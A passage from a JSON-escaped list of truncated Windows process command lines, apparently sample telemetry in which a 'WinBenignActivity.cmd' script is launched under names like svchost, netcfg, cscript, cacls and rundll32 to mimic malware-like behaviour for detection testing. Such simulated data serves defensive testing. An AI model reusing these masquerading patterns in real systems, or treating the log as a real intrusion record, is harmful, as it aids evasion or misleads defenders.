c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 24 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21672...\",\"ping  127.0.0.1 -n 24 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9125 ...\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32  \\\\24845\\\\2750.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 24 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 24 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 24 \",\"rundll32  \\\\32641\\\\32360.exe\",\"ping  127.0.0.1 -n 24 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping  127.0.0.1 -n 24 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 24 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 11 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 20 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping  127.0.0.1 -n 11 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe UserCxt\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\compattelrunner.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 13 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -15216 /...\",\"ping  127.0.0.1 -n 19 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 5 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -30962...\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32  \\\\28790\\\\506.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 8 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 3 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 2 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 29 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping  127.0.0.1 -n 30 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 17 \",\"rundll32  \\\\5728\\\\16265.exe\",\"ping  127.0.0.1 -n 22 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 22 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9528 ...\",\"ping  127.0.0.1 -n 22 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 22 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 22 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 22 \",\"rundll32  \\\\5914\\\\3172.exe\",\"ping  127.0.0.1 -n 22 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping  127.0.0.1 -n 22 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 22 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 22 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 25 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 32 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping  127.0.0.1 -n 2 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 16 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -981 /74...\",\"ping  127.0.0.1 -n 20 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 24 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1796 ...\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32  \\\\25124\\\\21095.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 3 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 10 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 19 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 10 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 13 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping  127.0.0.1 -n 22 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 1 \",\"rundll32  \\\\15930\\\\31294.exe\",\"ping  127.0.0.1 -n 20 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 20 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18358...\",\"ping  127.0.0.1 -n 20 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 20 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 20 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 20 \",\"rundll32  \\\\24611\\\\27906.exe\",\"ping  127.0.0.1 -n 20 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping  127.0.0.1 -n 20 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 20 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 20 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 6 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 11 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping  127.0.0.1 -n 26 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 18 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -19514 /...\",\"ping  127.0.0.1 -n 21 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 11 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11149...\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32  \\\\10012\\\\26584.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"3...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 30 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 17 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 21 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 18 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 30 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 17 \",\"rundll32  \\\\26132\\\\13555.exe\",\"ping  127.0.0.1 -n 18 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 18 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -26958...\",\"ping  127.0.0.1 -n 18 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 18 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 18 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 18 \",\"rundll32  \\\\21814\\\\15398.exe\",\"ping  127.0.0.1 -n 18 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping  127.0.0.1 -n 18 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 18 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 20 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 23 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping  127.0.0.1 -n 17 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"taskhostw.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe RefreshSettings\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 21 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -5279 /3...\",\"ping  127.0.0.1 -n 21 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 30 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"ping  127.0.0.1 -n 25 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 23 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 23 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 26 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 14 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping  127.0.0.1 -n 5 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 1 \",\"rundll32  \\\\3567\\\\28584.exe\",\"ping  127.0.0.1 -n 15 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 15 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25563...\",\"ping  127.0.0.1 -n 15 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 15 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 15 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 15 \",\"rundll32  \\\\17279\\\\3548.exe\",\"ping  127.0.0.1 -n 15 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping  127.0.0.1 -n 15 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 15 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 2 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 2 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping  127.0.0.1 -n 9 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"cmdline unknown\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"cmdline unknown\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff 